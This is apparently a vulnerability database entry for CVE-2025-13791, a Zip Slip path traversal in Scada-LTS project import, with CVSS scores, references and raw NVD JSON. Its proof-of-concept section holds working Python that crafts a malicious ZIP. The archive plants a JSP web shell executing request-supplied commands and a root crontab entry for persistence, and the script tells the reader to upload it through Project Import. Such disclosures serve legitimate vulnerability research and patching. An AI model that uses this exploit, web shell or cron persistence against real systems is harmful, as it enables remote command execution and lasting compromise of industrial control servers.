CVE-2025-13791

Description

A vulnerability was identified in Scada-LTS up to 2.7.8.1. Affected is the function Common.getHomeDir of the file br/org/scadabr/vo/exporter/ZIPProjectManager.java of the component Project Import. Such manipulation leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:scada-lts:scada-lts:*:*:*:*:*:*:*:* - VULNERABLE

Scada-LTS < 2.7.8.1

Scada-LTS up to 2.7.8.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zipfile
import os
import sys

def create_zip_slip_poc():
    """
    Generate a PoC ZIP file for CVE-2025-13791 - Scada-LTS Zip Slip vulnerability
    This PoC demonstrates how a malicious ZIP file can be crafted to write files outside
    the intended extraction directory using path traversal sequences.
    """
    output_file = "scada_lts_zipslip_poc.zip"
    
    # Create a malicious ZIP file with path traversal in filename
    with zipfile.ZipFile(output_file, 'w', zipfile.ZIP_DEFLATED) as zipf:
        # Normal file (will be extracted to intended directory)
        zipf.writestr("project/config.xml", "<config>normal</config>")
        
        # Malicious file with path traversal - writes to parent directory
        # Change ../../../ to target desired system location
        malicious_path = "../../../tmp/scada_lts_poc.txt"
        zipf.writestr(malicious_path, "CVE-2025-13791 PoC - Path Traversal Successful!")
        
        # Example: Overwrite web shell
        zipf.writestr("../../../webapps/ROOT/shell.jsp", "<%@ page import=\"java.io.*\" %><% Process p=Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>")
        
        # Example: Add to crontab for persistence
        zipf.writestr("../../../var/spool/cron/root", "* * * * * /tmp/malicious.sh")
    
    print(f"[+] PoC ZIP file created: {output_file}")
    print(f"[+] Files in archive:")
    with zipfile.ZipFile(output_file, 'r') as zipf:
        for info in zipf.infolist():
            print(f"    - {info.filename}")
    print("\n[!] Upload this ZIP file through Scada-LTS Project Import functionality")
    print("[!] The path traversal files will be written outside the intended directory")

if __name__ == "__main__":
    create_zip_slip_poc()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13791
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13791
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13791/
[4] VulDB https://vuldb.com/cve/CVE-2025-13791
[5] https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-ZipSlip-1/report.md
[6] https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-ZipSlip-1/report.md#proof-of-concept
[7] https://vuldb.com/?ctiid.333795
[8] https://vuldb.com/?id.333795
[9] https://vuldb.com/?submit.690873

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13791", "sourceIdentifier": "[email protected]", "published": "2025-11-30T16:15:46.277", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Scada-LTS up to 2.7.8.1. Affected is the function Common.getHomeDir of the file br/org/scadabr/vo/exporter/ZIPProjectManager.java of the component Project Import. Such manipulation leads to path traversal. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:scada-lts:scada-lts:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.8.1", "matchCriteriaId": "E420F2FD-D264-4284-A5BE-F62F0227AA2B"}]}]}], "references": [{"url": "https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-ZipSlip-1/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Xzzz111/exps/blob/main/archives/Scada-LTS-ZipSlip-1/report.md#proof-of-concept", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://vuldb.com/?ctiid.333795", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333795", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.690873", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}